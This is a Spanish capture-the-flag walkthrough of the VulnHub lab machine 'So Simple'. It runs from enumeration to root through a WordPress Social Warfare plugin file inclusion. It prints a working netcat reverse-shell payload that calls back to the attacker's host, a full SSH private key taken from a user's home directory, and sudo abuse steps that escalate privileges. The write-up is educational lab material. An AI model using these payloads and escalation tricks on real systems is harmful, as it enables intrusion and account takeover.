[VULNHUB] So Simple

Hoy vamos a hackear la maquina de Vulnhub llamada So Simple.Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/so-simple-1,515/

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.64 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-27 01:36 CEST Nmap scan report for so-simple.home (192.168.1.64) Host is up (0.00045s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: So Simple Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.30 seconds

Exploramos mas en detalle el Apache para ver si encontramos alguna carpeta interesante.

~ > gobuster dir -u http://192.168.1.64/ -w /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.64/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/07/27 01:37:22 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htpasswd (Status: 403) /server-status (Status: 403) /wordpress (Status: 301) =============================================================== 2020/07/27 01:37:26 Finished ===============================================================

Vemos que aparentemente hay un wordpress instalado. Usamos wpscan para mirarlo mas en detalle.

~ > wpscan --url http://192.168.1.64/wordpress _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ Â® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.2 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N] [+] URL: http://192.168.1.64/wordpress/ [192.168.1.64] [+] Started: Mon Jul 27 01:38:56 2020 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.41 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.1.64/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce ss [+] http://192.168.1.64/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://192.168.1.64/wordpress/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://192.168.1.64/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10). | Found By: Rss Generator (Passive Detection) | - http://192.168.1.64/wordpress/index.php/feed/, https://wordpress.org/?v=5.4.2 | - http://192.168.1.64/wordpress/index.php/comments/feed/, https://wordpress.org/?v=5.4.2 [+] WordPress theme in use: twentynineteen | Location: http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/ | Latest Version: 1.6 (up to date) | Last Updated: 2020-06-10T00:00:00.000Z | Readme: http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/readme.txt | Style URL: http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6 | Style Name: Twenty Nineteen | Style URI: https://wordpress.org/themes/twentynineteen/ | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.6 (80% confidence) | Found By: Style (Passive Detection) | - http://192.168.1.64/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6 , Match: 'Version: 1.6' [+] Enumerating All Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] Plugin(s) Identified: [+] simple-cart-solution | Location: http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/ | Last Updated: 2020-02-21T23:06:00.000Z | [!] The version is out of date, the latest version is 1.0.0 | | Found By: Urls In Homepage (Passive Detection) | | Version: 0.2.0 (100% confidence) | Found By: Query Parameter (Passive Detection) | - http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/assets/dis t/js/public.js?ver=0.2.0 | Confirmed By: | Readme - Stable Tag (Aggressive Detection) | - http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/readme.txt | Readme - ChangeLog Section (Aggressive Detection) | - http://192.168.1.64/wordpress/wp-content/plugins/simple-cart-solution/readme.txt [+] social-warfare | Location: http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/ | Last Updated: 2020-04-14T17:03:00.000Z | [!] The version is out of date, the latest version is 4.0.1 | | Found By: Urls In Homepage (Passive Detection) | Confirmed By: Comment (Passive Detection) | | Version: 3.5.0 (100% confidence) | Found By: Comment (Passive Detection) | - http://192.168.1.64/wordpress/, Match: 'Social Warfare v3.5.0' | Confirmed By: | Query Parameter (Passive Detection) | - http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/assets/css/style .min.css?ver=3.5.0 | - http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/assets/js/script .min.js?ver=3.5.0 | Readme - Stable Tag (Aggressive Detection) | - http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/readme.txt | Readme - ChangeLog Section (Aggressive Detection) | - http://192.168.1.64/wordpress/wp-content/plugins/social-warfare/readme.txt [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <=============================================================================== ================================> (21 / 21) 100.00% Time: 00:00:00 [i] No Config Backups Found. [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Mon Jul 27 01:39:03 2020 [+] Requests Done: 54 [+] Cached Requests: 5 [+] Data Sent: 13.004 KB [+] Data Received: 546.451 KB [+] Memory used: 202.164 MB [+] Elapsed time: 00:00:06

Exploitation

Encontramos el plugin social warfare, el cual esta desactualizado. Buscamos si tiene alguna vulnerabilidad y encontramos lo siguiente[1]. En /var/www/html creamos shell.txt:

<pre> system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.111 1234 >/tmp/f"); </pre>

Ponemos nc a la escucha.

nc -nlvp 1234

Por ultimo visitamos: http://192.168.1.64/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp _url=http://192.168.1.111/shell.txt

Low Shell

~ > nc -nlvp 1234 listening on [any] 1234 ... connect to [192.168.1.111] from (UNKNOWN) [192.168.1.129] 60010 /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data)

En /home/max/.ssh encontramos una key privada ssh (id_rsa). La copiamos en nuestra maquina.

www-data@so-simple:/home/max/.ssh$ cat id_rsa -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY----- www-data@so-simple:/home/max/.ssh$

Le damos los permisos adecuados.

~ > nano key ~ > chmod 600 key

Utilizamos la key para conectarnos como max por ssh.

~ > ssh max@192.168.1.64 -i key Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon Jul 27 20:01:31 UTC 2020 System load: 0.09 Usage of /: 56.6% of 8.79GB Memory usage: 31% Swap usage: 0% Processes: 136 Users logged in: 0 IPv4 address for docker0: 172.17.0.1 IPv4 address for enp0s3: 192.168.1.64 IPv6 address for enp0s3: 2a01:c50e:21e3:0:a00:27ff:fed8:65bd * "If you've been waiting for the perfect Kubernetes dev solution for macOS, the wait is over. Learn how to install Microk8s on macOS." https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/ 47 updates can be installed immediately. 0 of these updates are security updates. To see these additional updates run: apt list --upgradable The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Wed Jul 15 19:18:39 2020 from 192.168.1.7 max@so-simple:~$

user.txt

max@so-simple:~$ cat user.txt 073dafccfe902526cee753455ff1dbb0

Miramos si podemos hacer algo con sudo.

max@so-simple:~$ sudo -l Matching Defaults entries for max on so-simple: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User max may run the following commands on so-simple: (steven) NOPASSWD: /usr/sbin/service

Vemos que podemos ejecutar service como "steven", Lo usamos para obtener los privilegios de steven.

max@so-simple:~$ sudo -u steven service ../../bin/bash steven@so-simple:/$ id uid=1001(steven) gid=1001(steven) groups=1001(steven)

user2.txt

steven@so-simple:/tmp$ cd ~ steven@so-simple:/home/steven$ ls user2.txt steven@so-simple:/home/steven$ cat user2.txt b662b31b7d8cb9f5cdc9c2010337f9b8

Miramos si podemos hacer algo con sudo.

steven@so-simple:/$ sudo -l Matching Defaults entries for steven on so-simple: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User steven may run the following commands on so-simple: (root) NOPASSWD: /opt/tools/server-health.sh

Privilege Escalation

Vemos que podemos ejecutar un script .sh el cual no existe. Procedemos a crear las carpetas necesarias y el script, el cual contendra "/bin/bash". Por ultimo le daremos permisos de ejecucion y lo ejecutaremos con sudo para obtener los privilegios de root.

steven@so-simple:/tmp$ mkdir -p /opt/tools/ steven@so-simple:/tmp$ echo "/bin/bash" > /opt/tools/server-health.sh steven@so-simple:/tmp$ chmod +x /opt/tools/server-health.sh steven@so-simple:/tmp$ sudo /opt/tools/server-health.sh root@so-simple:/tmp#

flag.txt

root@so-simple:/tmp# cd /root root@so-simple:~# ls flag.txt snap root@so-simple:~# cat flag.txt /$$$$$$ /$$ /$$ /$$__ $$ | $$ | $$ | $$ \__/ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$$$| $$ | $$ /$$__ $$| $$__ $$ /$$__ $$ /$$__ $$|____ $$|_ $$_/ |____ /$$/| $$ | $$ | $$ \ $$| $$ \ $$| $$ \ $$| $$ \__/ /$$$$$$$ | $$ /$$$$/ |__/ | $$ $$| $$ | $$| $$ | $$| $$ | $$| $$ /$$__ $$ | $$ /$$ /$$__/ | $$$$$$/| $$$$$$/| $$ | $$| $$$$$$$| $$ | $$$$$$$ | $$$$//$$$$$$$$ /$$ \______/ \______/ |__/ |__/ \____ $$|__/ \_______/ \___/ |________/|__/ /$$ \ $$ | $$$$$$/ \______/ /$$ /$$ /$$ /$$ | $$ /$$/ | $/ | $$ \ $$ /$$//$$$$$$ /$$ /$$|_//$$ /$$ /$$$$$$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$ /$$$$$$ /$$$$$$$ \ $$$$//$$__ $$| $$ | $$ | $$ /$$//$$__ $$ /$$__ $$| $$ | $$ | $$| $$__ $$ /$$__ $$ /$$__ $$ \ $$/| $$ \ $$| $$ | $$ \ $$/$$/| $$$$$$$$ | $$ \ $$| $$ | $$ | $$| $$ \ $$| $$$$$$$$| $$ | $$ | $$ | $$ | $$| $$ | $$ \ $$$/ | $$_____/ | $$ | $$| $$ | $$ | $$| $$ | $$| $$_____/| $$ | $$ | $$ | $$$$$$/| $$$$$$/ \ $/ | $$$$$$$ | $$$$$$$/| $$$$$/$$$$/| $$ | $$| $$$$$$$| $$$$$$$ |__/ \______/ \______/ \_/ \_______/ | $$____/ \_____/\___/ |__/ |__/ \_______/ \_______/ | $$ /$$ /$$$$$$ /$$$$$$ /$$ | $$ /$$ /$$ | $//$$__ $$ /$$__ $$|__/ |__/ | $$ | $/ |_/| $$ \__/ /$$$$$$ | $$ \__/ /$$ /$$$$$$/$$$$ /$$$$$$ | $$ /$$$$$$|_/ | $$$$$$ /$$__ $$ | $$$$$$ | $$| $$_ $$_ $$ /$$__ $$| $$ /$$__ $$ \____ $$| $$ \ $$ \____ $$| $$| $$ \ $$ \ $$| $$ \ $$| $$| $$$$$$$$ /$$ \ $$| $$ | $$ /$$ \ $$| $$| $$ | $$ | $$| $$ | $$| $$| $$_____/ | $$$$$$/| $$$$$$/ | $$$$$$/| $$| $$ | $$ | $$| $$$$$$$/| $$| $$$$$$$ \______/ \______/ \______/ |__/|__/ |__/ |__/| $$____/ |__/ \_______/ | $$ | $$ |__/ Easy box right? Hope you've had fun! Show me the flag on Twitter @roelvb79

End

Y con esto ya seriamos root de la maquina [1] https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-wordpress-social-warfare-plugin-cve-2019-9978/